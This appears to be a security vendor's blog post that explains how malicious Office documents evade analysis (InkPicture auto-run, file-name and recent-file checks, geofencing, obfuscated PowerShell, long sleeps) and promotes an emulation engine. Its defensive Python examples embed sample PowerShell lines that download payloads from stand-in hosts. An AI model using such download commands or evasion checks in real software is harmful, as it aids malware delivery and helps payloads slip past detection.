Today, malicious documents (so-called "maldocs") are a very common initial attack vector (e.g. as an E-Mail attachment). Over time, threat actors have improved the techniques behind malicious Office files to make indicator of compromise (IOC) extraction and general detection more difficult. Such techniques include VBA macro obfuscation, environment and geofencing checks for targeted attacks, anti-analysis tricks (e.g. long sleeps / sleep loops) and additional obfuscation layers (e.g. via obfuscated cmd/PowerShell and VBS/JS scripts). Only after all of these layers have been unwrapped and bypassed is the actual payload / malware downloaded from an external host. Thus far, the only solution has been to execute Office files within an isolated environment (sandbox) and monitor their behavior (e.g. network connections). This requires a complex setup and is time and resource intensive.
We have taken on the challenge of implementing sophisticated emulators that can unwrap these "matryoshka"-like maldocs at a 10x speed improvement vs. traditional sandboxing solutions.
As part of our free community site launch at FileScan.IO, we want to showcase a few interesting files that contain today's anti-analysis and obfuscation techniques, as well as demonstrate the results of our engine processing those files successfully. For your pleasure, please follow the cross-referenced links in our footer section to dive even deeper into the respective techniques.
Example Techniques (Sample #1)
The file implements the following techniques:
InkPicture
This technique has been described widely[1] in the industry as a method to execute malicious code when the document is opened on the targeted machine. Instead of using the classic Document_Open or Auto_Open events, the macro is attached to InkPicture, one of a group of ActiveX controls whose events launch VBA macro code when the document is opened.
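As a rough illustration of why this matters for static triage, the sketch below scans macro source for procedures that may run without user action. It assumes the InkPicture handler follows the commonly reported `<ControlName>_Painted` naming; the pattern list and the sample macro are written for this example only and are not taken from the analyzed file.

```python
import re

# Classic auto-run entry points plus ActiveX event handlers such as
# InkPicture1_Painted. The list is illustrative, not exhaustive.
AUTOEXEC_PATTERN = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|\w+_Painted)\b",
    re.IGNORECASE | re.MULTILINE,
)


def find_autoexec_subs(vba_source: str) -> list[str]:
    """Return the names of procedures that may run without user action."""
    return [m.group(1) for m in AUTOEXEC_PATTERN.finditer(vba_source)]


# Hypothetical macro source, written for this example only.
SAMPLE_VBA = """
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As Object)
    RunPayload
End Sub

Sub RunPayload()
    ' payload logic would live here
End Sub
"""

print(find_autoexec_subs(SAMPLE_VBA))
```

A scanner that only looks for Document_Open or Auto_Open would report no entry point for this macro, which is the reason the ActiveX route is attractive to attackers.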
Document name checking
Certain malware families have implemented checks that read the document name prior to execution, because analysis systems often rename files prior to analysis[2]. Thus, it is important to analyze a file in an environment as close to the "would be" environment as possible.
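To make the idea concrete, here is a minimal sketch of what such a check could look like, modeled in Python rather than VBA. It assumes the macro treats a file name consisting only of an MD5, SHA-1 or SHA-256 style hex string as a sign of a renamed sample; the function name and the heuristic are hypothetical and real families may test other conditions.

```python
import re
from pathlib import PureWindowsPath

# Assumption: sandboxes often store samples under their hash, so a name made
# only of 32, 40 or 64 hex characters is treated as suspicious.
HASH_NAME = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.IGNORECASE)


def name_looks_renamed(document_path: str) -> bool:
    """Mimic a maldoc check that refuses to run under a hash-like file name."""
    stem = PureWindowsPath(document_path).stem
    return bool(HASH_NAME.match(stem))


print(name_looks_renamed(r"C:\samples\d41d8cd98f00b204e9800998ecf8427e.doc"))
print(name_looks_renamed(r"C:\Users\bob\Documents\Invoice_2021.doc"))
```

Under this assumption, an analysis system that keeps the original file name passes the check, while one that renames the file to its hash does not.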
Recent file count
Another known anti-analysis technique implemented by maldoc authors is to check the total number of recent documents opened by Word historically[3], as a vanilla Windows installation (often used as part of a simple sandbox setup) will have no recent documents and/or very few usage artifacts in general. If the system that analyzes the malware isn't prepared properly, no malicious code will be executed.
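The gate described above can be modeled in a few lines. This is a sketch under stated assumptions: the `WordEnvironment` class, the function name and the threshold of 3 are hypothetical, chosen only to show how the value reported to the macro decides whether execution continues.

```python
from dataclasses import dataclass


@dataclass
class WordEnvironment:
    """Values an emulated Word instance reports back to macro code."""
    recent_file_count: int


def macro_would_continue(env: WordEnvironment, minimum_recent_files: int = 3) -> bool:
    """Model of the gate: proceed only if Word looks like it has been used."""
    return env.recent_file_count >= minimum_recent_files


fresh_sandbox = WordEnvironment(recent_file_count=0)   # vanilla installation
emulated_user = WordEnvironment(recent_file_count=12)  # plausible usage history

print(macro_would_continue(fresh_sandbox))
print(macro_would_continue(emulated_user))
```

The point of the model is that the answer depends on a single environment value, so an analysis system that controls that value can present a lived-in machine without actually having one.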
Geofencing protection
Some malware campaigns focus on a specific region due to certain interests like geopolitics. It's common for such campaigns[4] to implement a technique dubbed geofencing. More precisely, the malware checks the region in which it is being executed (e.g. by checking the system language or the geolocation of the outbound IP address) before downloading any payloads. As the payload download location (e.g. a specific external host) is the key Indicator of Compromise that an analyst is interested in, failing to bypass such checks is extremely unfortunate. There are means of bypassing such checks in automated systems (e.g. keeping a list of pre-configured VPN servers to choose from, which allows emulating a specific region). However, as the targeted region is often not known a priori, manual inspection of an initial analysis is necessary to understand which system configuration is needed, followed by an additional analysis run. This is a very time-consuming task. Wouldn't it be nice to bypass geofencing checks the first time around in a matter of seconds?
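A minimal sketch of the language-based variant follows. It is not a description of any particular engine: `sample_geofence` is a hypothetical check invented for this example, and the candidate list contains only a handful of Windows locale identifiers (LCIDs). The sketch shows why replaying a check against candidate values is cheap when the analysis system controls what the macro sees.

```python
from typing import Callable, Iterable, Optional

# Windows locale identifiers (LCIDs) for a few UI languages.
CANDIDATE_LCIDS = {1033: "en-US", 1031: "de-DE", 1040: "it-IT", 1041: "ja-JP", 1049: "ru-RU"}


def sample_geofence(lcid: int) -> bool:
    """Hypothetical check: the macro continues only on a Japanese system."""
    return lcid == 1041


def find_passing_locale(check: Callable[[int], bool], candidates: Iterable[int]) -> Optional[int]:
    """Replay the check under each candidate locale; return the first that passes."""
    for lcid in candidates:
        if check(lcid):
            return lcid
    return None


lcid = find_passing_locale(sample_geofence, CANDIDATE_LCIDS)
print(CANDIDATE_LCIDS.get(lcid))
```

With a full sandbox, each candidate would mean reconfiguring and rerunning a virtual machine; in this model it is one function call per candidate.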
Example Techniques (Sample #2)
PowerShell obfuscation
The actual payload download is hidden behind an obfuscated PowerShell command line. Typical anti-analysis techniques involve Base64 encoding, GZIP-compressed byte streams that are inflated at runtime, string concatenation tricks and Invoke-Obfuscation.
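The first three layers named above can be peeled with the Python standard library alone. The sketch below is a simplified illustration: the helper names are our own, the sample command is harmless and built inside the example, and real-world scripts (especially Invoke-Obfuscation output) need far more than this. It relies on the fact that `powershell -EncodedCommand` expects Base64 of UTF-16LE text.

```python
import base64
import gzip
import re


def decode_encoded_command(b64_text: str) -> str:
    """Decode the argument of powershell -EncodedCommand (Base64 of UTF-16LE)."""
    return base64.b64decode(b64_text).decode("utf-16-le")


def inflate_base64_gzip(b64_text: str) -> str:
    """Decode a Base64 string that wraps a GZIP-compressed UTF-8 script."""
    return gzip.decompress(base64.b64decode(b64_text)).decode("utf-8")


def fold_string_concatenation(script: str) -> str:
    """Merge adjacent single-quoted literals: 'ht'+'tp' becomes 'http'."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    previous = None
    while previous != script:  # repeat until no more pairs can be merged
        previous = script
        script = pattern.sub(r"'\1\2'", script)
    return script


# Build a harmless layered sample so the example is self-contained.
inner = "(New-Object Net.WebClient).DownloadString('ht'+'tp://exa'+'mple.invalid/a')"
layer1 = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode("ascii")
layer2 = base64.b64encode(layer1.encode("utf-16-le")).decode("ascii")

recovered = fold_string_concatenation(inflate_base64_gzip(decode_encoded_command(layer2)))
print(recovered)
```

Only after the last step does the URL appear as a contiguous string, which is why IOC extraction on the outer layers alone finds nothing.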
IOCs hidden behind multiple obfuscation layers
Long sleeps
A typical anti-analysis technique is to sleep for a long time before performing additional malicious activity. In this case, a long sleep is performed after sending an HTTP request to the payload delivery host.
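One reason emulation can shrug off long sleeps is that an emulator owns the clock. The following sketch uses a hypothetical `VirtualClock` class: a sleep request advances virtual time and is logged, but nothing actually waits. It is a simplified model and does not cover scripts that cross-check time against external sources.

```python
import time


class VirtualClock:
    """Clock for an emulator: sleeping advances virtual time without waiting."""

    def __init__(self, start: float = 0.0) -> None:
        self.now = start
        self.skipped = []  # record of every sleep the script requested

    def sleep(self, seconds: float) -> None:
        self.skipped.append(seconds)
        self.now += seconds


clock = VirtualClock()
wall_start = time.monotonic()
clock.sleep(600)    # the script asks for ten minutes...
clock.sleep(3600)   # ...and then for another hour
wall_elapsed = time.monotonic() - wall_start

print(clock.now, clock.skipped)
```

The logged sleep durations are useful in their own right, since an unusually long sleep is itself a behavioral signal.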
Why does the analysis time matter?
Organizations need systems that can get insights (e.g. IOCs) from the attack chain of files arriving at their perimeters as quickly as possible. Today, the attack surface has become quite broad compared to what was the case in the old economy. While we still have the traditional inbound E-Mails, we also have a wide range of cloud services, network shares, bring-your-own-device ("BYOD") and remote workers connected to poorly secured home networks, among other channels that expose endpoints to unknown files. Therefore, a key challenge is being able to extract IOCs from a large quantity of incoming files quickly, as that allows instant blocking and internal scanning.
We are excited to present a solution that can beat nearly all known evasion techniques used by cybercriminals in the wild and give insights into a large part of the full attack chain in less than 30 seconds*. This is possible due to our unique and sophisticated proprietary emulation engines, which are capable of analyzing VBA, PowerShell, CMD, VBScript and JavaScript.
FileScan.IO Analysis Report
The platform provides the user with an overview of the submitted file and all the results that our engine extracted during the analysis. The summary helps the user understand whether the file is malicious and which signals (our behavior signatures) matched during the analysis:
Emulation Data Results
The most interesting section of FileScan is our emulation engine. As shown above, the sample mentioned at the beginning of the article contains several techniques that, combined, make it difficult to analyze the file automatically and reach the final stage. When the file is processed on our platform, the system detects the different evasion techniques and beats them in order to recover the full execution chain:
Our emulation engine is able to detect and beat all the known evasion techniques used and reach the final payload behind this document file:
As can be seen in the screenshot above, the FileScan.IO engine was able to emulate the file and beat all the evasion methods it found, recovering the write event that would occur on a system where the expected conditions are met and the file is allowed to execute.
Indicators of Compromise
All (potential) IOCs extracted from the input file, any emulation layer, any extracted or downloaded file, etc. are aggregated and presented in a simple type-ordered overview page that is reachable from the top-left menu.
You can use these IOCs to quickly find related samples, perform additional threat intelligence research, update your security perimeter / firewalls and scan your corporate network for other potentially compromised endpoints.
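For readers who want to reproduce a type-ordered overview on their own data, the sketch below groups IOC candidates found across several text layers. The patterns are deliberately simple, the layer contents are made up for this example (using a documentation-range IP address), and none of this reflects how the FileScan.IO backend is implemented.

```python
import re
from collections import defaultdict

# Deliberately simple patterns; production extractors handle many more cases.
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE),
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "sha256": re.compile(r"\b[0-9a-fA-F]{64}\b"),
}


def aggregate_iocs(layers: list[str]) -> dict[str, list[str]]:
    """Collect IOC candidates from every layer, grouped by type, without duplicates."""
    grouped = defaultdict(list)
    for text in layers:
        for ioc_type, pattern in IOC_PATTERNS.items():
            for value in pattern.findall(text):
                if value not in grouped[ioc_type]:
                    grouped[ioc_type].append(value)
    return dict(grouped)


# Hypothetical emulation layers, written for this example only.
layers = [
    "cmd /c powershell -w hidden",
    "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/payload.bin', $p)",
    "Invoke-WebRequest http://198.51.100.7/payload.bin",
]

print(aggregate_iocs(layers))
```

Deduplicating across layers matters because the same host typically shows up in several stages of the chain.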
* The average analysis time is ~15 seconds per file, but outliers remain.
References / Footnotes